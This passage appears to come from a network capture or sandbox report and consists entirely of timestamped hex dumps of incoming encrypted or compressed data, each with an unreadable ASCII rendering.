                                                                                                  2023-06-06 15:28:28 UTC2169INData Raw: a6 9b f9 c0 79 3a f2 3e c9 5a fc 2a 3f 72 71 a2 d9 ce 80 b4 6a 0f e4 bc 8b f3 4a 07 79 5f ad a7 69 58 4f ed 6d 1c 4c f8 ab db 8a cc fe d9 de 2f cb 3e 8c db f5 2f 52 12 c8 ab 20 14 20 b1 c1 82 71 06 f1 21 d8 28 99 15 75 00 93 2f 1c 23 47 64 f3 a0 24 f6 0a de 84 9b b1 e4 e2 8c 1f a5 0c fd 58 aa 59 9b ae fe 4b df b1 c5 7f 52 1c 10 7e a8 7f 22 84 79 3d f7 48 81 d2 d0 ad a1 f6 42 db d3 11 3a b3 86 55 2f 9b 73 c9 78 22 e2 9d ae ae 3e 4d 98 dc 30 54 e9 e8 58 3b e9 18 9d d4 53 0d cd a3 5f 66 6a 5d 0f 37 91 98 a6 0d 00 83 98 84 db b2 fb 5e 11 e8 ac ef 25 ae cb 1f a2 be 0b 64 ea 4b 58 31 8c 87 fa 1d b2 84 08 a9 0f ae 81 a1 b0 9b ef 4c 16 0d 2d 07 7a e4 f3 d5 3e e0 a6 3a 02 83 66 02 de 50 a7 09 51 ec d4 b8 d5 92 d7 c1 75 76 80 74 a7 9c 04 d0 ef 54 28 03 94 c3 91 70
                                                                                                  Data Ascii: y:>Z*?rqjJy_iXOmL/>/R q!(u/#Gd$XYKR~"y=HB:U/sx">M0TX;S_fj]7^%dKX1L-z>:fPQuvtT(p
                                                                                                  2023-06-06 15:28:28 UTC2185INData Raw: 07 16 74 f9 32 e5 1d 64 6c a6 43 a5 5f 2e 32 92 4f 3d 3a 6d 9d c9 ce 29 26 80 7b d8 3a d2 10 f1 1a bc 5c fc 78 0f d1 09 9b ba 79 82 35 ca 1d 49 c7 a2 9d ba e5 e8 a7 d5 46 25 a8 93 19 74 7f 4e ca e1 49 08 66 7c cd 9a 7b 67 e3 36 9a 87 46 8c 6b 2a 85 74 d1 d5 98 38 88 a8 f8 7a 23 01 b6 66 c3 f5 d3 68 28 44 d8 f0 de 62 ad 70 df 29 db f6 ec 8b 3d 98 1d 2a 3c 22 ec 14 41 32 43 35 26 5d d7 87 fb 9f c2 44 be 43 e4 94 9e 94 cb e7 b6 11 c3 83 31 22 49 6a b6 12 bb 62 ce 13 ce f8 23 4f 05 2a 48 fd 48 b8 2c ec 91 86 af a9 53 f6 b7 2a b3 8c c4 1e e6 7f 58 23 3a 3f 91 0b e1 5d c7 22 fe 5c dc 25 69 39 ec 75 07 4a 26 2b 36 f0 35 0c b0 c4 ed 4e 10 ff 29 c4 26 86 94 9d 91 b2 d5 cd cb 13 7c 31 9e 49 06 8c 93 ac e0 fa c0 df 75 58 33 9d a6 f9 80 02 0a 07 af 52 ca f4 5a 50 95
                                                                                                  Data Ascii: t2dlC_.2O=:m)&{:\xy5IF%tNIf|{g6Fk*t8z#fh(Dbp)=*<"A2C5&]DC1"Ijb#O*HH,S*X#:?]"\%i9uJ&+65N)&|1IuX3RZP
                                                                                                  2023-06-06 15:28:28 UTC2201INData Raw: 79 c5 1e 32 4f 6f ba 90 93 0c 1f e9 84 98 1f 1f 08 d2 fe fb 8b 22 1a 5f 09 8e 58 07 00 65 cd 4f 44 0f 8f 8a db 6c a9 8d f4 e0 ae 64 ad 8a 57 fa f3 0c 2c 32 d4 c0 41 78 90 98 a6 98 1c 53 eb 86 b3 31 e1 c9 0d ba 2b 13 ef f4 b6 94 71 f3 65 3d 24 cb 49 0d 0b d8 4c 86 6e 27 b9 2c 4c 8d a7 d3 c7 44 2a fd 17 a5 df b4 60 12 ae f0 97 db 14 ea 7f 96 bc c0 94 e9 82 d6 b6 1f cb ec ef 65 16 7e b0 ef 47 c8 d5 5d 85 27 05 ac e3 40 a6 d0 6b 93 3d a3 80 fe a4 c9 f4 f2 f3 60 aa 41 4d 64 c4 32 16 76 dc e8 c3 94 7d ba 08 87 e6 83 08 2f 4f 0a 47 7c 34 de 21 48 d8 bb 65 3f 88 63 61 6e 3f 15 4a 68 84 bb 96 9d a7 21 a6 91 78 05 f8 a1 98 4e f3 cc 87 3d ae 55 08 a6 c1 78 bb fd 2a 89 d6 9a ae 40 76 57 88 61 bc 35 c5 99 68 bf 43 06 02 16 73 d5 f7 8a 0a 6f 8e 00 ef b9 9c 54 cd c8 9e
                                                                                                  Data Ascii: y2Oo"_XeODldW,2AxS1+qe=$ILn',LD*`e~G]'@k=`AMd2v}/OG|4!He?can?Jh!xN=Ux*@vWa5hCsoT
                                                                                                  2023-06-06 15:28:28 UTC2217INData Raw: 9b 30 4a f7 4b 66 75 85 9b 11 7b ed 5c ec 44 1c fc ee 1b 47 88 33 5c fa 4d d4 86 dd 3b 5a e4 78 3d a2 ca 8e 8e 08 99 c8 9b 60 aa 9d 1b bb f2 43 64 ca 2d 29 14 be a2 e6 e7 4d aa f0 4a 71 58 27 f6 8e dc dc f7 3f 54 21 fe 8f 03 db 81 e7 7a 55 1a a0 f2 d5 d7 bf f2 ca 42 22 0a 25 48 1a 13 de 77 47 7e 31 b7 4b 89 1e d3 ae 91 1b 08 bf 68 38 c4 47 e9 80 1c 52 19 4c 05 11 50 18 c3 35 32 7a 6b a9 ed ae fd ba 43 72 62 cb 50 74 94 c6 72 64 31 55 46 a3 b9 e0 ec 5e a4 11 b2 e6 02 8a f6 13 69 97 7c 3a 78 75 c4 6a c1 b4 67 30 85 69 61 4b ea 64 3b 02 45 44 d4 a8 9a 37 23 61 f2 60 bc ab 22 42 4f 98 6b 22 1e 1a ca 39 e9 b5 6f 1c a4 7d 50 fb 41 7e 25 2c f4 ae 45 be e2 c8 6a 59 b0 d5 b2 7e 1c 03 86 4e 3b 35 03 b0 a2 2a 39 86 c5 d6 5e cb 54 86 11 1e fe d1 39 03 01 47 f9 4d 45
                                                                                                  Data Ascii: 0JKfu{\DG3\M;Zx=`Cd-)MJqX'?T!zUB"%HwG~1Kh8GRLP52zkCrbPtrd1UF^i|:xujg0iaKd;ED7#a`"BOk"9o}PA~%,EjY~N;5*9^T9GME
                                                                                                  2023-06-06 15:28:28 UTC2233INData Raw: 5e 6c c6 d0 5c 00 45 13 d0 b3 3f 4d 48 60 ba 2d a6 01 a5 11 26 77 f3 55 a9 0d f0 2d 2f 69 a3 aa 9f bd a3 ae 07 ca fe 3d 03 87 bb 17 16 b0 79 be 3b 5c 27 f4 bc 48 5a a0 15 82 ce e0 cc c0 97 de ac 28 4f 06 8b 77 bf 31 7b 77 5d 3c b5 77 ee 00 bc c7 ee 63 29 92 f7 c0 f5 a4 99 26 7a 51 a0 88 8c 9f 45 87 fb 76 92 bb 87 ac ca a5 81 ef 5f 30 1e fc 6c f7 8e a5 d4 45 03 ab fd fb 46 db d0 16 99 44 ba e9 57 08 6b cd bf 17 bb e9 06 78 27 49 47 46 d9 2f a0 3f 0e ca 56 c0 7c cf f4 6e 38 80 26 e3 76 64 db c2 e2 02 27 22 f0 9c b4 3f e8 8f 99 78 dc 6b c2 b7 10 1e c4 6f 2e 7a 9d 82 a7 5a d6 c6 47 35 68 30 57 e7 84 4d c9 c5 27 15 06 b4 20 cd 8a 49 92 7e c8 88 8b b9 71 d8 73 e6 03 09 98 4a 13 ca 7c b0 dd 77 33 52 03 a3 27 b4 c6 b9 1d 0c 92 13 88 0f 46 67 e1 c8 4b b7 61 c4 a3
                                                                                                  Data Ascii: ^l\E?MH`-&wU-/i=y;\'HZ(Ow1{w]<wc)&zQEv_0lEFDWkx'IGF/?V|n8&vd'"?xko.zZG5h0WM' I~qsJ|w3R'FgKa
                                                                                                  2023-06-06 15:28:28 UTC2249INData Raw: 30 ca 85 21 c9 da c3 8a 96 b9 3c ac 92 8c e6 72 34 f5 be 4f bd ff b1 f1 1b b0 04 c6 2e f7 84 b9 0d e7 50 67 87 88 47 7a 39 ea a0 10 d5 31 ba b9 94 03 7b 2f 09 a1 45 03 89 3b 0e 6e 00 ad f0 f6 f6 f3 22 a4 47 e4 71 5a 31 5e cc 91 43 15 4b 3b 43 1e 3b 9b 61 8b 65 0e 81 fb af fe 59 66 17 06 33 dd 59 18 de 68 23 f9 86 5d e2 4c 8e b0 39 13 04 8a c8 5e 39 61 b3 20 6d 9f 1c c6 84 1d a2 fe 28 9d e3 52 d8 06 af cc 8a ed 0f c6 ae c3 6b f4 dd 98 0b 99 07 74 6d 99 58 b2 55 76 d8 6c bf 85 c1 dc 95 ca 87 98 ac 34 b9 be aa 99 05 e4 13 5b d7 a6 42 00 d2 05 db 60 36 61 d3 28 05 b6 3b b9 13 cb 84 92 e1 5d 65 92 82 f4 0e aa 7e 39 72 af 57 4c 81 3c b3 5e bd 87 8d e7 0c f8 75 05 c4 55 8f 91 68 8f ec 3d a6 7d b3 31 1d fa d7 a0 c2 b5 f8 27 69 6c 79 e1 ca 80 b9 90 2e 07 6e ef f9
                                                                                                  Data Ascii: 0!<r4O.PgGz91{/E;n"GqZ1^CK;C;aeYf3Yh#]L9^9a m(RktmXUvl4[B`6a(;]e~9rWL<^uUh=}1'ily.n
                                                                                                  2023-06-06 15:28:28 UTC2265INData Raw: 50 50 4d 69 82 ba 2e 26 0e bd ed 47 68 d2 3a 4a 00 eb 9e 61 d3 a4 2b c8 46 20 af 03 ba 25 4c 99 bf ed fc 0b 79 7a f8 17 f7 a8 32 3b 45 db e2 3a 46 98 4c 4a 80 cb e2 38 1a 8f 31 10 fa 45 9e 39 62 7a 11 50 53 e2 0c 00 40 24 c9 6e d7 30 09 cd b4 a5 fd b3 6b 25 a6 8e d0 38 97 64 7b 45 47 25 10 54 b9 2a b0 1f b7 8d 1b 1d 17 39 23 a1 29 66 32 2b 47 33 11 f6 76 cb ce 4e e7 dd 28 90 15 f0 9b f8 d4 55 52 f7 a9 92 bc 94 c9 0e 0b 8a d4 22 b0 2b 7c 7a 42 2b 8e 01 bf 07 77 7f 21 52 73 20 01 da 73 17 cc 52 71 b7 de 16 5e cc f8 cb a0 29 69 12 e7 80 d4 2e fb a2 a2 47 60 aa 53 56 88 99 3b 59 dc db 35 25 6a d4 59 60 c8 f0 87 48 de 00 e2 f9 14 bf b7 da b1 3f 03 0c 79 f3 8b 71 fe 82 47 d5 21 4f 49 e9 ff 40 43 a5 ba e8 aa 24 41 7f c3 ed ab 55 81 aa 90 94 f3 ac 45 3f 17 8e 36
                                                                                                  Data Ascii: PPMi.&Gh:Ja+F %Lyz2;E:FLJ81E9bzPS@$n0k%8d{EG%T*9#)f2+G3vN(UR"+|zB+w!Rs sRq^)i.G`SV;Y5%jY`H?yqG!OI@C$AUE?6
                                                                                                  2023-06-06 15:28:28 UTC2281INData Raw: 29 61 45 e3 6c 93 c3 57 db 6f b0 07 b1 81 66 07 24 05 53 fa 3b 79 6d 51 76 be c7 1e 6c 38 c6 87 39 e1 84 7f 1e a8 3f 41 d2 12 29 e4 b6 fe 02 80 87 9d 8d 86 a8 9c a0 d5 42 7c 9c c8 20 18 29 03 0c 3e 37 e8 94 64 23 d3 91 92 3c 9d 4b f2 1c ea 25 43 8d be a5 c4 9f c2 ee a3 3c 62 ac 92 f2 80 c5 a7 64 7c 09 1b df ef 07 3b cf 2d 70 77 25 72 21 8f 14 c6 e4 47 a7 00 e1 48 05 6e 72 ae 27 3b 73 8f ba 68 95 9d e2 8a 9a fe e0 4c fe c3 78 19 be d8 21 2e f8 2c 76 aa 2b bd c0 9a 98 4a 84 57 67 83 c0 d2 bb 9e 6f f7 3a 8d 0c b1 7e 63 5e ec 35 3f 81 55 3f 37 f4 13 83 2a 62 23 5d 30 45 cd 14 c2 02 7b 1f fe 69 51 02 0f 89 84 5f b6 53 1a 43 c0 f1 14 df c8 72 ea 3b 08 c0 0a aa aa 68 d7 60 45 29 44 bb a4 44 80 18 ff b4 be d2 03 cf c3 fc 44 f8 94 3e 0c c5 9a 1a df 8a 27 43 5c fd
                                                                                                  Data Ascii: )aElWof$S;ymQvl89?A)B| )>7d#<K%C<bd|;-pw%r!GHnr';shLx!.,v+JWgo:~c^5?U?7*b#]0E{iQ_SCr;h`E)DDD>'C\
                                                                                                  2023-06-06 15:28:28 UTC2297INData Raw: 5b ee eb 9c 13 f3 b8 34 23 11 12 09 2b fd 60 8f 89 b3 f6 aa 83 9a 27 aa e6 e2 80 c2 81 53 b4 28 04 3a a8 fc 83 33 26 ab c5 3c ac 9e 81 fa b0 ab 0c 9e 30 07 94 bf fb c1 18 9a 49 82 d5 ff 5a cd 31 28 f7 6c e5 35 37 af 70 b9 52 cc f1 10 8f 5b 08 50 31 c6 b8 b7 8d 6c ff 02 61 2e 85 1d 00 a5 ca 7a ac 92 bf 1a 7a 6b e9 6c 9f 1a 89 14 a0 13 82 4a 8b 50 b2 84 0e 85 bb b8 b4 eb ed 6b 95 a6 7d 8d fe 54 2e 34 8e 3a a8 27 da 84 6b 16 03 98 59 8a 3f 6d 17 4b 13 9f f7 ac 6a e6 6f ab 80 a7 86 eb e9 b0 e1 5d f3 ab bb 39 dc 9c d2 82 55 40 0f 27 1e 97 9c a0 b1 f2 44 19 9f 48 46 e6 45 79 32 3d 2f 2f b0 38 27 0a d0 8b 12 cd c1 3c 9a 23 33 4e 9d 63 fa d8 3c 11 b4 a9 29 fb 67 9f bc 2b 8f 30 1f ea 2e a3 6d 52 7e 61 cd 74 4a af 78 a5 71 37 f7 c8 ee 94 d9 fa ac 4e c7 13 1c 88 45
                                                                                                  Data Ascii: [4#+`'S(:3&<0IZ1(l57pR[P1la.zzklJPk}T.4:'kY?mKjo]9U@'DHFEy2=//8'<#3Nc<)g+0.mR~atJxq7NE
                                                                                                  2023-06-06 15:28:28 UTC2313INData Raw: f5 f9 4e f5 1a 2d 78 7c c1 20 78 ee 93 82 12 22 db 2c 45 3c 67 c0 3e b8 cd 50 df 78 66 c4 5b c5 7e 96 fc fb c5 63 e1 9b 9c 3e 89 d9 6d c0 d9 43 c5 7f 6b 88 a7 74 b1 e9 e8 a9 17 8d 0f 27 52 da 73 75 81 f0 88 e7 80 47 51 5c 21 41 b5 62 71 00 99 ac 47 d3 9d 09 ff b1 79 ee 04 fe 5e 36 f0 c3 93 23 e7 08 ff 86 3e e6 16 1b 2c a4 e3 bd 17 79 29 4f 86 6f e1 2f 64 aa 8e 9d d0 31 cb 81 8c 9b 6e 40 7a 3c c1 a3 f6 9b 6f 1b f3 52 cb 35 cf 34 27 9b a0 78 e5 47 04 69 19 76 02 0b b9 33 a0 7e 0c 0f a2 23 e2 7a f5 6a bf 8c d6 d8 cc ef 83 7c 3b a8 8c e7 93 1f bf 62 dd c5 58 4a d4 5f 8e 93 6a 5e f8 87 7e 2d e7 8d cb c7 0c 57 e8 06 3a 8c 91 25 7a f4 13 f6 61 97 89 57 94 4e b1 fa 05 63 0c 93 49 9f 0a 0a 8f 86 70 58 ab 05 67 6a 45 0c d2 e4 4f 77 0a b8 8c a8 e8 07 5e fa 1d 9b b6
                                                                                                  Data Ascii: N-x| x",E<g>Pxf[~c>mCkt'RsuGQ\!AbqGy^6#>,y)Oo/d1n@z<oR54'xGiv3~#zj|;bXJ_j^~-W:%zaWNcIpXgjEOw^
                                                                                                  2023-06-06 15:28:28 UTC2329INData Raw: e5 29 23 4b 14 07 66 e1 c3 79 c2 48 38 2a e4 1c b9 ce e0 b4 71 5f 00 b9 8e f9 a8 f7 f2 b3 46 c5 96 88 12 87 ec 85 31 cf c8 72 07 c4 3e 8b 93 2b 62 fd 13 24 c7 a3 28 95 ae 24 fd c6 26 f9 5c 79 9c dd 66 78 13 81 00 c1 31 2f db 8b be e4 7a d4 e2 1e 7e 10 74 c2 78 60 2d 09 af ab 41 ea 3f 0d 5f 41 5a dc e7 6e f4 69 35 0c ce b7 17 b4 53 22 7c a2 ad 98 6f 7f 70 e8 85 c4 1b dc bf 99 1f 5a 10 f4 90 52 b2 fd 39 2f d3 12 18 94 cd c4 e2 8f 90 80 d8 b3 bf 2d a5 f6 db 44 dc 45 1f 50 58 8c fb 16 4e 9a 05 28 7d 83 22 87 ce 58 93 d1 f0 53 ad 8c 53 ff fe 25 1d 16 e2 c5 e8 9f 2b 08 3b 5b 30 e5 37 ae 59 4e 70 43 a4 8a f1 bd d2 ce a8 3d 36 be b2 5b 22 35 3a 04 1a 3e b4 03 bf 41 83 3d a4 a7 82 98 f5 15 ea 0d 1a 43 80 53 08 13 66 7e f0 d9 83 d9 04 20 bf 31 1e d0 cd fa 90 aa b7
                                                                                                  Data Ascii: )#KfyH8*q_F1r>+b$($&\yfx1/z~tx`-A?_AZni5S"|opZR9/-DEPXN(}"XSS%+;[07YNpC=6["5:>A=CSf~ 1
                                                                                                  2023-06-06 15:28:28 UTC2345INData Raw: 9b 87 de 07 df f8 bf cf d0 73 52 2c 18 fb 1e 28 bd 04 8a 71 ec 7f 78 1f 4f 33 9b f9 e1 ff 92 a6 a6 45 33 d6 c1 53 c1 82 fe 87 50 46 51 26 45 00 46 ae 2f f8 6b 98 74 d8 ce 59 eb 15 16 f2 a4 34 6d ec 16 e8 ae 14 7a 27 5e d0 78 3b 12 6b 50 b4 e0 62 2a 14 49 3c dd 67 aa 0f e3 60 74 4b 05 1b 73 13 2c 76 c1 5c 28 69 a0 3f 07 8d c1 c4 2e 40 51 fe 83 08 1b 35 04 ed 79 c5 ed c9 60 bf 22 70 db 41 90 98 a2 16 c3 98 ed 46 1b 50 e2 87 68 ab c8 7b 1e 3f 83 8f 7f 74 a7 43 3b e9 05 a1 6b 70 83 b9 7a 05 76 79 5c 39 75 4b 49 37 20 5c f2 e8 9f 69 af c4 0a 51 c8 9a 40 1f a1 1e 0b 56 06 52 d7 2b ab a9 de 9e 11 c0 16 56 bc 41 ff 31 e6 5f 5e 2c e8 49 2a a9 01 90 17 d5 28 8d 03 34 f5 74 e0 65 10 30 94 b0 d3 02 88 94 4a b9 98 32 4b eb c8 66 22 6a 42 cd 35 fe b9 f9 7c 40 29 e5 9d
                                                                                                  Data Ascii: sR,(qxO3E3SPFQ&EF/ktY4mz'^x;kPb*I<g`tKs,v\(i?.@Q5y`"pAFPh{?tC;kpzvy\9uKI7 \iQ@VR+VA1_^,I*(4te0J2Kf"jB5|@)
                                                                                                  2023-06-06 15:28:28 UTC2361INData Raw: b9 5a 61 41 ae 96 e6 20 be 27 93 26 e8 f0 35 ed 5a 21 42 fd 3a f9 2f 12 e1 16 52 99 31 f4 bb 13 9d 89 e9 22 c5 fc 7b 06 70 00 71 bd be 52 63 c0 5b 36 ff 57 5a 40 2e 87 f2 bc b7 4c f8 ab bc c8 17 6c 72 c1 cb 43 11 64 39 7c 84 db 9b 92 c3 64 6d 84 6f e4 ea b0 ed c8 cb 89 e6 39 90 a3 1d 65 88 1d 57 87 43 1d 64 e9 c8 d2 cf 2a 6a 42 af 9b 07 54 7f 9d 60 c5 b7 5a eb cf df 49 f0 43 4a 3f 06 1f d3 52 f4 4e 78 72 72 68 b2 7c 66 64 ae d5 27 e6 66 2d f1 d9 96 ff 74 6a ec ca 1b 9a e6 ad 97 6d e2 8b 91 d9 fa d7 84 54 c4 15 72 30 62 6c 58 46 f7 d2 a9 fb 13 c3 bb 87 3e 1b 3b 16 65 8e 78 64 3a 41 54 6b 42 4c 7f 33 9e 5f 65 03 d7 6c 50 38 60 27 3c 15 9d c2 64 1e 9e a7 ee e6 73 3e 11 88 b3 87 43 82 9f 01 c6 e0 f9 46 a5 c5 90 0e 76 a9 94 0a 86 2e 16 ff 8d 9e 26 e1 00 1a 1b
                                                                                                  Data Ascii: ZaA '&5Z!B:/R1"{pqRc[6WZ@.LlrCd9|dmo9eWCd*jBT`ZICJ?RNxrrh|fd'f-tjmTr0blXF>;exd:ATkBL3_elP8`'<ds>CFv.&
                                                                                                  2023-06-06 15:28:28 UTC2377INData Raw: 09 4e e4 f6 d0 ca c0 c6 cf 4e 6f 2f 37 d2 65 64 d3 7d 8a db e4 c9 b9 6e 08 27 2e 05 2f 8e 7c 7d cb be c8 c1 2c 9b 74 99 be 41 cc be 2f 1b fe e8 df f6 ec 9a b7 b9 d1 fa 31 db 51 fe 59 c4 8b 69 67 9c a8 66 f9 6e a3 a7 3f c1 87 4a c6 90 77 a1 7e e3 d5 83 09 26 f3 86 a6 41 f9 6c 0e 5f 32 3a 5c e2 91 a6 1e 7e d8 a1 4d 63 83 68 e5 d1 fc 1a 92 1d de 62 03 a8 18 52 24 b6 2f e5 8b 3f d5 d5 70 99 cf 9c c1 27 7b bf 89 b2 86 9f 63 e3 f5 47 1a 3b da 0b 35 b6 73 67 55 96 95 dc 56 0f 8c 34 b1 17 6d 6e 56 74 a5 69 29 2a a4 10 91 b8 bf 76 59 ef cb d4 98 a2 29 af 8b c7 df 4f 6b 35 80 2e 18 95 4e 94 da 93 0f 19 7f 3b 11 b2 ca 14 1e a7 9a a5 d1 be 7a 44 74 73 a1 f2 b0 0b 9f ed 2d b9 40 22 c8 f8 7c 0d f9 91 5c 2a c8 3e f9 f0 4e 91 5d 07 e1 66 52 4b 8e 90 0c 7a fd ae 81 b8 7b
                                                                                                  Data Ascii: NNo/7ed}n'./|},tA/1QYigfn?Jw~&Al_2:\~MchbR$/?p'{cG;5sgUV4mnVti)*vY)Ok5.N;zDts-@"|\*>N]fRKz{
                                                                                                  2023-06-06 15:28:28 UTC2393INData Raw: b2 6d 21 a3 c2 26 c2 02 09 1f d6 db 89 fe 57 fd df b8 a5 95 e1 1d 74 68 1c e7 ad 95 38 0a 93 2a fb 47 8e d4 ae 71 8d b0 c3 91 3e 70 47 3a 97 cb e7 91 d5 77 28 b0 b7 f8 28 c7 77 a0 96 ec fe 4e 0d 8b 98 37 54 c3 bb 2d 92 ea ff db 0b 64 71 83 19 3c df 51 26 e2 26 8a 8a 89 c2 0f 35 3b 4b 0e 67 37 c4 f5 ca b0 2e 57 87 c3 c7 f8 ea 77 22 fa 14 62 45 76 d0 77 c3 c3 9c c7 aa 6b 5b 5c 95 d8 c8 40 96 10 ac 1d 99 5b 1d 44 9a e0 b9 7e da f7 78 71 57 59 69 5e d5 7c 17 93 68 9b 04 7f c6 19 85 42 19 22 6c ae 44 ed 62 15 b5 a3 80 78 f3 bd 55 f9 e5 68 a0 23 06 1f d8 32 83 1b 66 8d cf 61 54 3b 7b 8b 6a 26 05 f6 d4 39 6b 79 ef 4c 0b 29 86 36 d7 d2 07 b6 34 e2 b6 81 5e cc 68 11 39 d2 96 72 27 28 58 46 bb b8 9f 8e f1 3a 6b e1 1b f9 a5 9a 79 03 03 e7 c1 74 e1 cc 69 de 4b 98 12
                                                                                                  Data Ascii: m!&Wth8*Gq>pG:w((wN7T-dq<Q&&5;Kg7.Ww"bEvwk[\@[D~xqWYi^|hB"lDbxUh#2faT;{j&9kyL)64^h9r'(XF:kytiK
                                                                                                  2023-06-06 15:28:28 UTC2409INData Raw: 7e e4 87 81 e0 b4 d0 c2 6a 53 ac 25 ef 3a f1 85 8d 3c 9c 75 c3 d6 85 72 58 b7 59 5d 3f 60 89 44 c4 bc ae ef d8 51 b4 62 da fc f7 ff 6d 5e b9 8d e4 35 e1 49 9a 1b a2 60 15 b5 e5 f5 07 e4 5c 38 5f c7 c0 3c 5d ff 77 b4 f4 76 c9 f4 9c 72 b9 92 57 14 6f 2b e6 46 24 25 08 0e a8 14 21 ba c9 a2 04 cf 6d 69 f2 b3 9c a0 16 aa e2 b2 37 cb f1 19 c3 51 3e cc 95 20 6b a5 f2 87 0a ab 21 38 58 3f 73 76 92 2e d1 cd 5a f6 9d b0 bd 21 6e 6c f6 8b b2 7e 93 49 97 e3 dc 97 0b ec 51 51 4a 8f 39 42 78 ef 9b f4 b3 ed 33 a0 7f b7 4e d1 16 d6 b6 3e 8b 5f cd 95 47 79 8b db ce 09 18 40 4f 68 b7 57 84 cc 61 d4 91 90 e5 86 71 30 03 4f 58 18 60 97 fe 23 fc 32 6e 30 03 11 be bb 35 b1 a3 bc 18 d5 d5 09 f9 88 fe dd e2 f6 54 21 09 62 06 f3 40 6b 07 45 7d 5b ca 1e 3b 56 24 92 34 26 18 36 6f
                                                                                                  Data Ascii: ~jS%:<urXY]?`DQbm^5I`\8_<]wvrWo+F$%!mi7Q> k!8X?sv.Z!nl~IQQJ9Bx3N>_Gy@OhWaq0OX`#2n05T!b@kE}[;V$4&6o
                                                                                                  2023-06-06 15:28:28 UTC2425INData Raw: 4c 20 c0 c4 c1 6a 2c 72 85 85 35 17 dd 79 81 8d a9 33 59 99 95 11 d1 f6 4e e9 24 c1 1d 07 37 d7 e9 66 9b d6 bf 96 26 51 ee 7d 97 a5 59 63 9f f4 b6 b6 e0 96 dd 99 cb a9 ce 88 cd ac 84 5d 90 76 6c 83 6d 7f 26 30 65 7d e8 0e 6f c4 45 6e 87 da e8 90 e9 20 ad b7 9e a0 45 a6 32 76 0b 10 96 b6 f8 23 3f 2c 4a ca 83 18 78 f2 9e 67 ce 0d f0 4b 0f a1 cf 01 54 ea ec d5 71 e5 25 5f 8e e5 2b 61 89 9d ee 94 26 8a 26 30 e3 b9 a0 af 6a 12 9d c9 a6 e1 5a 9a e3 b1 e5 07 10 04 e2 91 84 a3 8d 07 62 a5 ba 42 39 ec eb 4d 5c fc ac 13 46 48 7b 72 d4 e9 08 06 05 b6 22 98 0e dc 6f 95 38 16 3c eb 8f 79 72 ba 72 a7 92 bb 1f 1a 52 c1 f9 f9 86 ea 57 f8 71 9a a6 91 cf 34 2d 0d a2 3a 24 e0 22 c0 30 32 1d 28 10 46 c4 9b 98 a2 17 aa 6b e3 dd 28 85 5a 28 9b 4a f0 24 48 b6 ad 0b 0c 92 4f 89
                                                                                                  Data Ascii: L j,r5y3YN$7f&Q}Yc]vlm&0e}oEn E2v#?,JxgKTq%_+a&&0jZbB9M\FH{r"o8<yrrRWq4-:$"02(Fk(Z(J$HO
                                                                                                  2023-06-06 15:28:28 UTC2441INData Raw: 67 da a0 7c a9 d6 9f 51 c0 b1 9a 08 64 68 92 b8 b4 81 82 66 41 43 8a 64 2b 00 d1 2d f4 a0 5d 5b cc 0a ae 0c 39 69 72 82 05 0f 04 00 e9 be b1 33 2a f5 30 e0 91 d2 a6 6e a3 a6 02 28 ec 79 d6 5d 34 da a4 88 2f 6b b5 ce 7c 33 aa 1c 81 31 7a 1e d1 7c c2 cb e3 f9 cf 90 13 5f 7d cc 81 29 ca 5c 3b ce 73 2f 36 3e 1d 5c 84 52 02 fa b9 b6 2c 2e a6 23 d7 2b 60 80 7e ea ad 4e b6 21 a6 7f 88 bd 72 82 e3 a8 ab 06 1d 96 ec 00 61 47 c8 83 be b3 46 55 38 22 d6 0d 18 be 62 fb 4e c8 b2 3e cb 3c 1b 6d f4 44 10 69 d5 3d 8a ef fe 4c c8 ce 2a 0f 7d 50 d0 50 9b 57 d5 ee 9b 52 4b 8e 19 3d 63 a8 4e ff 90 a3 44 69 f5 a5 44 59 5e e9 a5 3b 0f ee 33 67 80 f1 85 33 7c 02 ce 8f 26 04 96 cf e9 17 3f f7 47 7e 67 cd eb 56 08 ee 6a da 83 07 a6 56 3f df 8b 4d 25 4b f4 02 eb 1c eb 88 82 3d 56
                                                                                                  Data Ascii: g|QdhfACd+-][9ir3*0n(y]4/k|31z|_})\;s/6>\R,.#+`~N!raGFU8"bN><mDi=L*}PPWRK=cNDiDY^;3g3|&?G~gVjV?M%K=V
                                                                                                  2023-06-06 15:28:28 UTC2457INData Raw: ca 69 c2 06 61 26 0f dd 65 f6 9d 5e 3e 8b a7 db ee 3c 4c df f1 55 3f c1 5a 83 87 e3 1f b7 bb 03 be e7 f9 78 2e 6f a1 60 fa 92 14 7e e5 4c b2 5e f2 25 5a 6f ed cf ef db c2 6d e3 72 c1 9b e1 20 83 20 f0 60 34 27 08 70 7a f2 5a 1b 58 ab 5d ef c0 06 10 8b 2e 14 ae 19 f8 8a 3d 80 d2 c9 33 42 6d b4 80 1f a3 65 20 21 1e f7 a5 77 d0 72 4f b0 e6 c1 78 93 22 21 ce be 79 eb 57 f6 6f 0b 48 6b 9c 87 9b 57 b4 34 48 17 ae 12 c9 a4 f1 5a ee 7a d0 72 6a 8b 32 42 c8 88 ef 4f a3 ee 7d 28 8b ad 18 df c5 7f 4d 14 21 87 6f df 54 98 81 51 78 77 6f 49 ee a3 88 47 a7 d2 05 15 3a 7a ad da 53 01 45 20 33 de fa 86 ca ea 44 b3 44 05 ab 98 66 e5 9f 89 7a e4 18 cd 72 5b 1b f9 59 c9 6a ee 4e 73 12 4d ae 44 78 ce c2 a8 86 aa c4 1c 12 2c 04 fd f3 1e a2 1a d9 f1 34 ca 00 be 75 90 a5 f4 1b
                                                                                                  Data Ascii: ia&e^><LU?Zx.o`~L^%Zomr `4'pzZX].=3Bme !wrOx"!yWoHkW4HZzrj2BO}(M!oTQxwoIG:zSE 3DDfzr[YjNsMDx,4u
                                                                                                  2023-06-06 15:28:28 UTC2473INData Raw: c3 ad 2c 57 de 3d b6 05 06 0a b2 f9 3a 16 db 70 64 c4 d0 83 8e 32 16 4a 35 f5 07 00 40 45 a3 b5 71 e6 5e 71 8d df bf 11 44 52 9f 9d e3 e9 ac 87 de 0e 1b d9 fd e3 d0 33 16 1b 6b 7f 7d ef 85 fe dc 95 60 af d7 32 ef ef ef a3 ba df 9b 4b 23 3f 2c 02 f2 65 05 86 a9 4f e3 ce 3f d0 57 1f 1e b8 4b 9a 34 58 ce 9c 91 e7 2a 7b 7e eb 52 b4 2e 52 71 5e d3 45 42 31 e2 1d bc d9 26 35 a6 1e e8 a9 e7 a1 7d eb 1b 7a 52 52 1d a3 db c7 84 b2 e2 22 cf 6b 71 64 f5 d0 6a 16 8e 63 e1 09 56 2f 61 09 14 37 f9 4c 33 eb f5 9b e5 8b 9e b9 1b b3 b6 f7 ec 2f 11 5e df 12 31 f8 2c fb f5 89 3a 00 48 6b 4d c4 a4 